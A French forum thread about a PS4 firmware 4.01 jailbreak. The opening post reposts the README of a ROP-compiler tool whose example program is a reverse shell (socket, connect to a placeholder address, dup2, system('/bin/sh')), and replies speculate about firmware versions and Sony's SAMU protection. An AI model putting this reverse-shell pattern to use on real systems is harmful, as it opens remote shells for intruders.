47 réponses à ce sujet

[tralala]

Chose promise, chose due, le code qui permet l'exploit sous firmware 4.01 a été dévoilé, il s'agit d'un outil privé sous forme de code qui permet le jailbreak de la PlayStation 4.

 

 

 

 

 

PRO: PROgramming ROP like a PRO

 

This is a crappy tool used in our private PS4 jailbreak. Since some version, the internal browser is compiled WITHOUT jit support, and sys_jitshm_xxx seems to be disabled for unprivileged process. We have to write the kernel exploitation in ROP, like what has been done in HENKaku jailbreak.

 

Build

 

pip install git+https://github.com/chaitin/pro

If you have modified the pro.g4 file, use the following commands to generate new lexer and parser.

 

cd pro/parse && antlr4 -no-listener -visitor -Dlanguage=Python2 pro.g4

Examples

 

toy {

    {% include "gadgets.pro" %}

    {% include "glibc.pro" %}

    const AF_INET(2);

    const SOCK_STREAM(1);

    const IPPROTO_IP(0);

    var fd;

    socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

    func store_rdx_rax<libc, 0x0002e60c, "rdx,rax::">;

    store_rdx_rax(&fd, undefined);

    printf("socket fd = %d\n", fd);

    array addr["\x02\x00\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"];

    connect(fd, addr, 0x10);

    {% for i in range(3): %}

        dup2(fd, {{i}});

    {% endfor %}

    system("/bin/sh");

    exit(1);

}

Usage

 

A BIG TODO. Just try and learn by yourself.

 

Quick Guide

 

All expressions should be evaluated during compilation, Const/Func should be initialized in declaration.

 

Func is initialized with . Base/Offset is used for relocation, Signature determines the calling convention of Func.

 

Array can be declared with size(Int) or directly initialized with its content(String).

 

For loop should be written in template script, it will be rendered before compilation. For more information, check Jinja2.

 

 

 

Bien entendu, ce code et les exemples sont réservés aux développeurs.

 

Tout est là : chaitin/pro

 

Téléchargement : ROP Tool 

 

[gael97421]

bon et pour les simple users comme moi, on fait quoi maintenant????

[cedsaill]

bon et pour les simple users comme moi, on fait quoi maintenant????

Attendre!! mais je sent que ca sent bon

[jbam]

Surtout ne pas mettre à jour sa console
C'est quand même dommage pour les constructeurs qu'ils n'ont pas droit de faire des mise à jour automatique obligatoire .

[Waikiki]

Mais c'est que ça sent super bon tout ça !!!!!!! Une console "next gen" hackée avec une architecture x86 me rappel une certaine console qui ressemblait à un tank je rêve d'un coinops sur une console HD !

[Grunchimera]

Wait and See , Noel/fin d'année sa sent bon !

[fabeer]

Mais c'est que ça sent super bon tout ça !!!!!!! Une console "next gen" hackée avec une architecture x86 me rappel une certaine console qui ressemblait à un tank je rêve d'un coinops sur une console HD !

1080i pour la xbox,ca reste de la HD

[rim-k06]

Yep,comme dis précédemment le code sur le github est incomplet pour l'instant.

un screen que j'ai fais de la shout de psxhax qui en parle
https://gyazo.com/77...803462eb586044b

[aspire78]

donc ça vaudrait la peine d'acheter une slim du stock dans les magasins au cas ou (j'ai pas encore de PS4)

Modifié par aspire78, 27 octobre 2016 - 20:45.

[bzé]

Yep,comme dis précédemment le code sur le github est incomplet pour l'instant.

un screen que j'ai fais de la shout de psxhax qui en parle
https://gyazo.com/77...803462eb586044b

oui mais là elle est jailbreaké, le reste pourrait aller très vite, regardes avec la vita, la vitesse que the flow à mis pour sortir le 2.0 avant mai dump.
il y a une petite guerre qui s'installe...à suivre

[nuinut]

Exact, ça peut aller très vite, j'ai deja ma ps4 qui dort mais pour ceux qui n'en n'ont pas, ça peut être l'occasion

[Mr K]

la question qui se pose maintenant, c'est: est-ce que la pro qui sort le 10 novembre, donc dans 15 jours sera en FW >4.01 ?......
ça peut valoir le coup d'attendre quelques jours et ensuite si besoin faire la chasse aux packs dans les magasins

Modifié par Mr K, 27 octobre 2016 - 20:52.

[bzé]

la question qui se pose maintenant, c'est: est-ce que la pro qui sort le 10 novembre, donc dans 15 jours sera en FW >4.01 ?......
ça peut valoir le coup d'attendre quelques jours et ensuite si besoin faire la chasse aux packs dans les magasins

ce serait un cadeau du ciel ! lol mais oui pkoi pas!!!!

Modifié par bzé, 27 octobre 2016 - 20:54.

[aspire78]

Justement j'hésite pour la pro, Si les box sont déjà sur le chemin oui ça vaut peut-être la peine ...

[nuinut]

Pas sûr que la sécurité soit la même sur ps4 et ps4 pro, comme sur ps3 et ps3 ultraslim

[bzé]

il y a chaque fois de quoi se poser des questions, sony ne fait plus de licence sur vita et hop une faille!
la pro le 10nov et hop une re-faille sur la slim???

[rim-k06]

Yep,comme dis précédemment le code sur le github est incomplet pour l'instant. un screen que j'ai fais de la shout de psxhax qui en parlehttps://gyazo.com/77...803462eb586044b

oui mais là elle est jailbreaké, le reste pourrait aller très vite, regardes avec la vita, la vitesse que the flow à mis pour sortir le 2.0 avant mai dump.il y a une petite guerre qui s'installe...à suivre

yep bzé, ça na pas de rapport avec les dumpers de tool ^^ la on parle de l'exploit en lui même,les hackeurs ont expliquer que leur exploit fonctionner de façon assez similaire à HENkaku,et comme le dit la news sur leur github il y a l'outil qui permet l'exploit,mais cet outil est incomplet et on ne peux rien en tirer a l’état actuel.

de plus même si on a l'exploit (jailbreak)(linux),ça veux pas du tout dire qu'on aura un dumper comme Vitamine ou MaiDump tool,la ps4 contient une sécurité qui s'appelle SAMU(Sécurity assets management unit)cet sécurité n'est pas présente sur la PS vita or elle l'est sur la ps4 et elle gère tout ce qui est signature de jeux hombrews savegame etc etc et même avec un exploit kernel on y aura pas accès,,voila pourquoi on ne voit pas de backup de jeux même en 1.76.

La fameuse sécurité SAMU
https://www.google.c...s/US20120102333

j'ai écrit un pavé pour t'expliquer pas pour t'agresser ou te dire que t'avais tort^^ (je prefere préciser au cas ou pour les susceptible qui traîne depuis 2 jours)

[shonan]

Excellent! Wait and see j'ai envie de dire.!

[bzé]

Yep,comme dis précédemment le code sur le github est incomplet pour l'instant. un screen que j'ai fais de la shout de psxhax qui en parlehttps://gyazo.com/77...803462eb586044b

oui mais là elle est jailbreaké, le reste pourrait aller très vite, regardes avec la vita, la vitesse que the flow à mis pour sortir le 2.0 avant mai dump.il y a une petite guerre qui s'installe...à suivre

yep bzé, ça na pas de rapport avec les dumpers de tool ^^ la on parle de l'exploit en lui même,les hackeurs ont expliquer que leur exploit fonctionner de façon assez similaire à HENkaku,et comme le dit la news sur leur github il y a l'outil qui permet l'exploit,mais cet outil est incomplet et on ne peux rien en tirer a l’état actuel.de plus même si on a l'exploit (jailbreak)(linux),ça veux pas du tout dire qu'on aura un dumper comme Vitamine ou MaiDump tool,la ps4 contient une sécurité qui s'appelle SAMU(Sécurity assets management unit)cet sécurité n'est pas présente sur la PS vita or elle l'est sur la ps4 et elle gère tout ce qui est signature de jeux hombrews savegame etc etc et même avec un exploit kernel on y aura pas accès,,voila pourquoi on ne voit pas de backup de jeux même en 1.76.La fameuse sécurité SAMUhttps://www.google.c...s/US20120102333 ;)j'ai écrit un pavé pour t'expliquer pas pour t'agresser ou te dire que t'avais tort^^ (je prefere préciser au cas ou pour les susceptible qui traîne depuis 2 jours)

écoute rim ! je vais faire court car je ne veux pas du tout partir comme l'autre cretin là où tu sais. je cite simplement un exemple de la vitesse (potentielle) à la quelle cela pourrait aller.je n'ai pas du tout confondu (dans le sens mélangé) les dumpers et l'exploit.en gros ce que je dit, c'est qu'on aura peut-être affaire à qq hacker et dev qui vont se la jouer à qui à la plus grosse genre le comportement de the flow par rapport au chinois (dixit the flow). la scène s'accélère à mon sens. et qd bien même? qui dit que personne ne détient un dump bien au chaud ?henkaku = +- juillet 2016 2 mois plus tard, the flow, une semaine après mai dump...même si tu multiplie par 10 ou peu importe, je pense connaître la suite logique un jour ou l'autre.

Modifié par bzé, 27 octobre 2016 - 21:31.

[rim-k06]

Yep,comme dis précédemment le code sur le github est incomplet pour l'instant. un screen que j'ai fais de la shout de psxhax qui en parlehttps://gyazo.com/77...803462eb586044b

oui mais là elle est jailbreaké, le reste pourrait aller très vite, regardes avec la vita, la vitesse que the flow à mis pour sortir le 2.0 avant mai dump.il y a une petite guerre qui s'installe...à suivre

yep bzé, ça na pas de rapport avec les dumpers de tool ^^ la on parle de l'exploit en lui même,les hackeurs ont expliquer que leur exploit fonctionner de façon assez similaire à HENkaku,et comme le dit la news sur leur github il y a l'outil qui permet l'exploit,mais cet outil est incomplet et on ne peux rien en tirer a l’état actuel.de plus même si on a l'exploit (jailbreak)(linux),ça veux pas du tout dire qu'on aura un dumper comme Vitamine ou MaiDump tool,la ps4 contient une sécurité qui s'appelle SAMU(Sécurity assets management unit)cet sécurité n'est pas présente sur la PS vita or elle l'est sur la ps4 et elle gère tout ce qui est signature de jeux hombrews savegame etc etc et même avec un exploit kernel on y aura pas accès,,voila pourquoi on ne voit pas de backup de jeux même en 1.76.La fameuse sécurité SAMUhttps://www.google.c...s/US20120102333 ;)j'ai écrit un pavé pour t'expliquer pas pour t'agresser ou te dire que t'avais tort^^ (je prefere préciser au cas ou pour les susceptible qui traîne depuis 2 jours)

écoute rim ! je vais faire court car je ne veux pas du tout partir comme l'autre cretin là où tu sais. je cite simplement un exemple de la vitesse (potentielle) à la que cela pourrait aller.je n'ai pas du tout confondu (dans le sens mélangé) les dumpers et l'exploit.en gros ce que je dit, c'est qu'on aura peut-être affaire à qq hacker et dev qui vont se la jouer à qui à la plus grosse genre le comportement de the flow par rapport au chinois (dixit the flow). la scène s'accélère à mon sens. et qd bien même? qui dit que personne ne détient un dump bien au chaud ?henkaku = +- juillet 2016 2 mois plus tard, the flow, une semaine après mai dump...même si tu multiplie par 10 ou peu importe, je pense connaître la suite logique un jour ou l'autre.

je disait pas tu tout ça pour te remballer au contraire juste pour essayer de vous dire a tous de pas vous enflammez au risque d'etre décu,SAMU est une tres grosse sécurité bien supérieur a ce qu'a connu la ps vita,c'est tout ce que je voulais te dire rien de mal